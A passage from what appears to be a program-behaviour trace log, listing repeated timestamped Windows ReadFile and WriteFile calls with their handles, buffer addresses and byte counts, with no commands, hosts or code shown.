nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.229] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x397, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, 